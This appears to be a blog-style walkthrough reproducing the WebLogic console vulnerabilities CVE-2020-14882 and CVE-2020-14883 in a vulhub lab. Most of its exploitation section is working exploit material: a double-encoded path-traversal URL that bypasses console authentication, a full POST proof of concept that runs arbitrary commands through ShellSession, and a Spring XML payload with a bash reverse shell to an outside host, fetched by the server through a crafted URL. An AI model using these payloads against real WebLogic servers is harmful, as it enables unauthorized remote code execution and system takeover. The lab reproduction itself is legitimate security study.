Weblogic management console unauthorized remote command execution vulnerability recurrence (cve-2020-14882/cve-2020-14883)

Disclaimer: This article is for learning and reference only. All resources involved in it are from the Internet. Please do not use them for any illegal acts, otherwise you will bear the corresponding consequences yourself, and I do not assume any legal and joint and several liabilities.

Vulnerability description

Weblogic is a J2EE application server launched by Oracle Corporation. In the October 2020 update, Oracle officially fixed two security vulnerabilities, namely CVE-2020-14882 and CVE-2020-14883; CVE-2020-14882 allows unauthorized users to bypass the authority verification of the management console Access to the background, CVE-2020-14883 allows any user in the background to execute arbitrary commands through the HTTP protocol. Using the exploit chain composed of these two vulnerabilities, commands can be executed as unauthorized arbitrary users on the remote Weblogic server through a GET request.

Affected version

WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0

Vulnerability recurrence

The vulnerability environment is built using vulhub, so I won’t repeat it here. After the environment is up, visit http://192.168.10.171:7001/console to access the background login page

Permission Bypass Vulnerability

Visit the url: http://192.168.10.171:7001/console/css/%252e%252e%252fconsole.portal, you can access the management background page without authorization (sometimes a 404 error will appear on the first visit, and it will be fine after the visit ok)

, but the current user is a low-privileged user who cannot install applications or execute commands directly. This time leads to the second vulnerability cve-2020-14883.

remote command execution

There are two ways to exploit this vulnerability, one is through com.tangosol.coherence.mvel2.sh.ShellSession, and the other is through com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext.
First use the first method, com.tangosol.coherence.mvel2.sh.ShellSession, the POC used is as follows:

POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: 192.168.26.103:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
cmd: whoami
Content-Length: 1258

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
Object obj = field.get(adapter);
weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
String cmd = req.getHeader("cmd");
String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
if (cmd != null) {
    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);
    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
    res.getServletOutputStream().flush();
    res.getWriter().write("");
}executeThread.interrupt();
");

rebound shell

View the success of the rebound shell

But this exploit method can only be exploited in versions above Weblogic 12.2.1, because the com.tangosol.coherence.mvel2.sh.ShellSession class does not exist in 10.3.6.
com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext is a more pass-through method, which was first proposed in CVE-2019-2725 and is valid for all Weblogic versions.

First construct an xml file and put it on the server that Weblogic can access (the server can use python to start the http service)

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[bash -i >& /dev/tcp/192.168.8.14/3340 0>&1]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

Then through the following URL, you can let Weblogic load this XML and execute the commands in it:

http://192.168.10.171:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(“http://192.168.8.14:8888/poc.xml”)

View the success of the rebound shell